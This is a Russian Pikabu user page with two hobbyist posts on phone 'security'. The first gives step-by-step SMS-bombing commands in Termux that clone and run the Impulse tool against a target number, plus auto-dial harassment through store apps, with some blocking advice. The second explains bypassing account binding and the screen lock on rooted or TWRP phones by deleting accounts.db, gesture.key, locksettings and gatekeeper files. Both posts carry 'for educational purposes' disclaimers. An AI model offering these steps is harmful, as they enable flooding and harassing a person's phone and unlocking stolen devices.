BypassAll

На Пикабу
поставил 0 плюсов и 0 минусов
95 рейтинг 1 подписчик 0 подписок 2 поста 0 в горячем

Телефонная безопасность и способы тестирования

Всем привет!

Сразу врубаем дисклеймер!


ВНИМАНИЕ!!!

ДАННЫЙ ПОСТ НАПИСАН СУГУБО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ! АВТОР ПРОТИВ ИСПОЛЬЗОВАНИЯ ДАННОЙ ИНФОРМАЦИИ В ЗЛЫХ ЦЕЛЯХ! АВТОР НЕ НЕСЁТ НИКАКОЙ ОТВЕТСТВЕННОСТИ ЗА ВАШИ ДЕЙСТВИЯ И ПРОСИТ ИСПОЛЬЗОВАТЬ ЕЕ ТОЛЬКО В БЛАГИХ ЦЕЛЯХ.


Приложения, о которых пойдёт речь есть в плеймаркете, поэтому это законно, если вы будете использовать эту информацию во благо, а не собираетесь наносить вред.


Сразу говорю, я пишу это сугубо для того, чтобы повысить электронную грамотность либо просто развлечь людей и я не хочу, чтобы эта информация была использована во зло.


Профессиональных способов, естественно, не будет. Так как это не мануал по пакостям, а гайд для того, кто хочет от этого защититься. В этом посте будут указаны только любительские методы.


Начнем с этой ситуации.

Зовется она автодозвон.


Как сделать?

Качаем приложение автодозвон с плеймаркета. Например это:

https://play.google.com/store/apps/details?id=com.adengappa либо это: https://play.google.com/store/apps/details?id=ru.lithiums.au...

Затем вводим тестовый номер, количество звонков и запускаем. Можно еще предварительно включить в личном кабинете оператора "анонимный номер" (На территории РФ (не знаю как с этим в других странах) операторы предоставляют такие услуги)


Как защитится?

В основном, любительские атаки такого типа проходят со скрытых номеров. Если у вас та же ситуация, то качаем любое приложение для блокировки звонков (например "не бери трубку") либо ставим в настройках самого телефона запрет принятия вызовов с анонимных номеров. А вообще я рекомендую заблокировать звонки с анонимных номеров сразу. Так вы защититесь и от таких пакостей и от всяких спамеров/мошенников/коллекторов. Но бывает и другая ситуация. С использованием SIP или VoIP. Тут всё посложнее. Это уже профессиональный тип и, как правило, звонки будут поступать с разных номеров. Для того, чтобы защититься от этого необходимо временно (либо постоянно) запретить звонки с незнакомых номеров вышеуказанным методом.


Следующая ситуация.

Зовется SMS Bomber.


Как сделать?

Качаем это:

https://play.google.com/store/apps/details?id=com.termux

А затем выполняем следующие команды по порядку (без квадратных скобок).

pkg update

pkg upgrade

pkg install python3 python3-pip git -y

git clone https://github.com/LimerBoy/Impulse

cd Impulse/

pip3 install -r requirements.txt

python3 impulse.py --method SMS --time [время атаки] --threads 30 [это не трогаем] --target +[номер телефона]


Как защититься?

Тут уже посложнее. Необходимо поставить смс клиент, который может блокировать в ЧС сообщения с "текстовых" номеров (где вместо номера телефона текст).

Например Textra (https://play.google.com/store/apps/details?id=com.textra) либо Pulse (https://play.google.com/store/apps/details?id=xyz.klinker.me...)

Просто заходим в необходимое смс, затем в шторку, а затем нажимаем на кнопку "чёрный список".


Ну либо в настройках телефона "принимать звонки и смс только от контактов". Не всем подойдёт, но это может спасти ситуацию.


Ну на этом все.


Напоминаю, что примеры того, как это организовать написаны сугубо для того, чтобы вы могли протестировать системы защиты. Пожалуйста, не используйте это во зло.

Показать полностью

Отвязка смартфона от аккаунта (любого) без пароля и маленький бонус

Всем привет!

На связи псевдохакер. Ну а если серьёзно, то ламер.


Начнем с дисклеймера!


ВНИМАНИЕ!!!!

ВСЯ ИНФОРМАЦИЯ НАПИСАННАЯ В ЭТОМ ПОСТЕ ПРЕДОСТАВЛЯЕТСЯ СУГУБО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ!!! АВТОР НЕ НЕСЁТ НИКАКОЙ ОТВЕТСТВЕННОСТИ ЗА ПРОТИВОПРАВНЫЕ ДЕЙСТВИЯ, СОВЕРШЕННЫЕ ПО ЭТОЙ ИНСТРУКЦИИ. АВТОР ПРЕДУПРЕЖДАЕТ, ЧТО ИСПОЛЬЗОВАТЬ ЭТУ ИНФОРМАЦИЮ МОЖНО ТОЛЬКО НА СВОИХ УСТРОЙСТВАХ ЛИБО НА УСТРОЙСТВАХ, ПРЕДОСТАВЛЕННЫХ ПРИ СОГЛАСИИ ИХ ВЛАДЕЛЬЦА!


Ну что, начнем)


Наверняка у кого-то из вас была такая ситуация, когда вы забыли пароль от вашего гугл аккаунта (либо любого другого аккаунта (это не важно, так как метод, о котором пойдёт речь удаляет привязку сразу ко всем аккаунтам, но не даёт к ним доступ (он просто удаляет их с вашего девайса))), а к нему привязан ваш девайс. Неприятно правда? Ну этот пост должен вам помочь))))


Сразу говорю, что этот метод работает только на рутованных смартах и на смартах с TWRP. Его преимущество в том, что он сохраняет все данные на искомом устройстве.


Для удаления всех аккаунтов с девайса необходимо запустить файловый менеджер (встроенный в TWRP, например, либо скачать что-то вроде Root Explorer), и с его помощью перейти в директорию «/data/system» (на некоторых смартфонах может быть иной путь, например, «/data/system/users/0/»).

В указанном фолдере разыскать упомянутый выше файл «accounts.db» и снести его.


Директория системы может называться по-другому, и их может быть несколько. В таком случае необходимо перейти в каждую директорию которая содержит слово "system" (не забывайте, что искомые директории необходимо искать в директор и "data") и снести ВСЕ файлы, которые содержат слово "accounts" (как правило такие файлы заканчиваются на .db)


Бонус:

Как удалить пароль с телефона, не зная его?


Переходим по пути

/data/system и сносим все нижеперечисленные файлы (некоторых может не быть):

gesture.key

locksettings.db

locksettings.db-wal

locksettings.db-shm

password.key

gatekeeper.pattern.key

gatekeeper.password.key


Готово. Перезагрузите гаджет, если вы делали это через файловый менеджер из системы, а если вы проводили данные манипуляции через TWRP, то можете сразу загружаться в систему.


Метод через TWRP все же предпочтительнее (так меньше вероятность сделать что-то не так).


Внимание!

Перед проведением подобных манипуляций необходимо создавать резервные копии.

Показать полностью
Отличная работа, все прочитано!